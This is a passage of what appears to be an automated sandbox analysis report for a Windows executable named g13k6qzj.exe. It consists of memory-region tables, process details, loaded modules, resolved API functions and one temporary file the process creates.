| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e2d0000 | 0x7e2d0000 | 0x7e3cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e3d0000 | 0x7e3d0000 | 0x7e3f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e3f8000 | 0x7e3f8000 | 0x7e3fafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e3fb000 | 0x7e3fb000 | 0x7e3fbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e3fc000 | 0x7e3fc000 | 0x7e3fefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e3ff000 | 0x7e3ff000 | 0x7e3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #221: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #221 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "Dotted_Line.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:28, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe48 |
| Parent PID | 0xe60 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
250
0x
BD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00200000 | 0x002bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00720000 | 0x00749fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x01cfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01d4ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:36 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #222: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #222 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:25, Reason: Child Process |
| Unmonitor | End Time: 00:03:29, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf4 |
| Parent PID | 0xc70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D74
0x
F4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
